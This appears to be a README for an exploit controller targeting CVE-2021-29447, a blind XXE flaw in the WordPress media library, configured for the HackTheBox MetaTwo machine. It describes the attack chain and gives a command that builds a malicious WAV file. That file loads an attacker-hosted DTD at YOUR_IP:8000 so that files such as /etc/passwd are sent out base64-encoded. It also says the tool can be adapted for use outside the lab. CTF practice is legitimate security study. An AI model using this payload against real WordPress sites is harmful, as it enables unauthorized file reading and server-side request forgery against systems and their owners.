I make this controller on doing metatwo machine in HackTheBox to exploiting CVE-2021-29447 which Is a WordPress XXE Vulnerability in Media Library affected version 5.7, 5.6.2, 5.6.1, 5.6, 5.0.11. where an authenticated user with ability to upload media library can upload malicious wav file that could lead to remote arbitrary file read and server side request forgery (SSRF)
To exploit these vulnerabilitie, it takes multiple steps to complete a successful attack.That is the result of parsed iXML metadata is not sent back to the user, so to exploit it we need a blind XXE payload. This is doable by including an external Document Type Definition DTD controlled by the attacker and we need to created the malicious wav file for getting back the connection on attacker listening server. Once we done these steps upload the wav file to server wait for receives an HTTP request that includes the base64 encoded content of our payload file eg: /etc/passwd and decode the base64. This controller has all solutions for these multiple steps. You only need type the filename on the controller $console >
Detailed blog https://blog.sonarsource.com/wordpress-xxe-security-vulnerability/
Note: This controller is fully configured to HTB metatwo machine. Any outside use you need too make some changes in scripts
Create a wave file named payload.wav
echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://YOUR_IP:8000/evil.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wavrun main.py
python3 main.py listen_ip